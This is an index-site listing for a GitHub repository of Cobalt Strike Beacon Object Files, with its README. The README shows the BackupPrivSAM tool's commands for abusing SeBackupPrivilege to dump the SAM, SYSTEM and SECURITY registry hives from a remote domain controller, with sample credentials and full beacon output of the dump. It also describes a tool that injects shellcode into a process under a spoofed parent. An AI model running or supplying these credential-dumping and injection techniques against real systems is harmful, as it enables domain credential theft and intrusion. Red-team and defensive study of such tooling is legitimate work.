Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/m57/cobaltstrike_bofs
My CobaltStrike BOFS
https://github.com/m57/cobaltstrike_bofs
Last synced: 21 days ago
JSON representation
My CobaltStrike BOFS
- Host: GitHub
- URL: https://github.com/m57/cobaltstrike_bofs
- Owner: m57
- Created: 2020-07-30T22:36:51.000Z (over 4 years ago)
- Default Branch: master
- Last Pushed: 2022-07-23T20:37:52.000Z (over 2 years ago)
- Last Synced: 2024-08-05T17:23:56.783Z (4 months ago)
- Language: C
- Size: 695 KB
- Stars: 156
- Watchers: 5
- Forks: 24
- Open Issues: 1
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - m57/cobaltstrike_bofs - My CobaltStrike BOFS (C)
README
# BackupPrivSam
A basic implementation of abusing the `SeBackupPrivilege` via Remote Registry dumping to dump the remote SAM SECURITY AND SYSTEM hives.
Inspired by https://twitter.com/filip_dragovic initial PoC. Just made it into a BOF.
Could be improved to auto download the hives. CBA
## Usage
```
BackupPrivSAM [\\computername] [save path] (optional: [domain] [username] [password])
```1. Dump the Hives to remote C:\ drive, using the current Primary Token
`BackupPrivSAM \\dc01.contoso.local C:\`
2. Dump the Hives to remote C:\ drive, and impersonate a user
`BackupPrivSAM \\dc01.contoso.local C:\ CONTOSO backup_service Password123`
## With Impersonation (SeBackupPrivilege enabled account)
```
beacon> backupPrivSAM \\cdc001.corp.contoso.local C:\ CORP backup_service *************
[*] Launching backupPrivSAM...
[+] host called home, sent: 2589 bytes
[+] received output:
Got Credentials. Making Token...
[+] received output:
Impersonated user: CORP\backup_service
[+] received output:
Will try to dump SAM from \\cdc001.corp.contoso.local\HKLM\ into folder 'C:\'
[+] received output:
Connecting to remote registry of '\\cdc001.corp.contoso.local'
[+] received output:
RegConnectRegistryW() - OK
[+] received output:
Dumping \\cdc001.corp.contoso.local\HKLM\SAM hive to C:\SAM
[+] received output:
Dumping \\cdc001.corp.contoso.local\HKLM\SYSTEM hive to C:\SYSTEM
[+] received output:
Dumping \\cdc001.corp.contoso.local\HKLM\SECURITY hive to C:\SECURITYbeacon> ls \\cdc001\C$
[*] Tasked beacon to list files in \\cdc001\C$
[+] host called home, sent: 29 bytes
[*] Listing: \\cdc001\C$\Size Type Last Modified Name
---- ---- ------------- ----
dir 04/29/2019 01:27:26 $Recycle.Bin
dir 04/27/2019 16:32:36 Documents and Settings
dir 05/05/2019 17:53:11 PerfLogs
dir 11/20/2019 11:30:27 Program Files
dir 04/28/2019 17:45:56 Program Files (x86)
dir 08/17/2021 21:09:38 ProgramData
dir 04/27/2019 16:32:36 Recovery
dir 04/28/2019 17:46:10 System Volume Information
dir 04/29/2019 01:26:56 Users
dir 10/02/2021 19:27:55 Windows
380kb fil 11/21/2016 00:42:45 bootmgr
1b fil 07/16/2016 14:18:08 BOOTNXT
1gb fil 07/19/2022 17:45:55 pagefile.sys
52kb fil 07/23/2022 21:23:45 SAM
32kb fil 07/23/2022 21:23:45 SECURITY
17mb fil 07/23/2022 21:23:45 SYSTEM
```## Without impersonation
```
beacon> make_token CORP\backup_service **********
[*] Tasked beacon to create a token for CORP\backup_service
[+] host called home, sent: 59 bytes
[+] Impersonated CORP\Administratorbeacon> backupPrivSAM \\cdc001.corp.contoso.local C:\
[*] Launching backupPrivSAM...
[+] host called home, sent: 2511 bytes
[+] received output:
Will try to dump SAM from \\cdc001.corp.contoso.local\HKLM\ into folder 'C:\'
[+] received output:
Connecting to remote registry of '\\cdc001.corp.contoso.local'
[+] received output:
RegConnectRegistryW() - OK
[+] received output:
Dumping \\cdc001.corp.contoso.local\HKLM\SAM hive to C:\SAM
[+] received output:
Dumping \\cdc001.corp.contoso.local\HKLM\SYSTEM hive to C:\SYSTEM
[+] received output:
Dumping \\cdc001.corp.contoso.local\HKLM\SECURITY hive to C:\SECURITYbeacon> ls \\cdc001\C$
[*] Tasked beacon to list files in \\cdc001\C$
[+] host called home, sent: 29 bytes
[*] Listing: \\cdc001\C$\Size Type Last Modified Name
---- ---- ------------- ----
dir 04/29/2019 01:27:26 $Recycle.Bin
dir 04/27/2019 16:32:36 Documents and Settings
dir 05/05/2019 17:53:11 PerfLogs
dir 11/20/2019 11:30:27 Program Files
dir 04/28/2019 17:45:56 Program Files (x86)
dir 08/17/2021 21:09:38 ProgramData
dir 04/27/2019 16:32:36 Recovery
dir 04/28/2019 17:46:10 System Volume Information
dir 04/29/2019 01:26:56 Users
dir 10/02/2021 19:27:55 Windows
380kb fil 11/21/2016 00:42:45 bootmgr
1b fil 07/16/2016 14:18:08 BOOTNXT
1gb fil 07/19/2022 17:45:55 pagefile.sys
52kb fil 07/23/2022 21:24:06 SAM
32kb fil 07/23/2022 21:24:07 SECURITY
17mb fil 07/23/2022 21:24:07 SYSTEM
```# QueueUserAPC_PPID
> queueuserapc_ppid/
BOF spawns a process of your choice under a specified parent, and injects a provided shellcode file via QueueUserAPC().
![](queueuserapc_ppid.gif)